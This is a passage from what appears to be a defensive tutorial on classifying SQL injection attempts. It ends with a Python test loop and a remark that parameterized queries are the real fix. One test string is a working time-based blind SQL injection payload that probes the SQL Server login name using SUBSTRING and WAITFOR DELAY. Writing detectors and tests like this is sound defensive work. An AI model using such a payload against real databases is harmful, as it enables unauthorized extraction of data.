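SUBSTRING_FORM = "3 IF(UNICODE(SUBSTRING((SELECT SYSTEM_USER),2,1))>96) WAITFOR DELAY '0:0:5'"
BENIGN = "SELECT RIGHT(card_no, 4) FROM orders WHERE id=3"

for sample in (PAGE_PAYLOAD, SUBSTRING_FORM, BENIGN):
    print(classify(sample))
```

Matching on expression structure rather than on one function name is what catches both forms; the injectable parameter itself is still fixed with parameterized queries, not with filtering.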